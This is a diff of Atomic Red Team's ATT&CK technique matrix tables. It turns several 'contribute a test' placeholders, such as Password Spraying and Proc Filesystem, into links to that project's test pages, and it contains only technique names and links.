 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -21,12 +21,12 @@
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-|  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -40,12 +40,12 @@
 |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [RC Scripts](../../T1037.004/T1037.004.md) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Service](../../T1543.002/T1543.002.md) |  | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Timers](../../T1053.006/T1053.006.md) |  | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  |  |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -6,11 +6,11 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
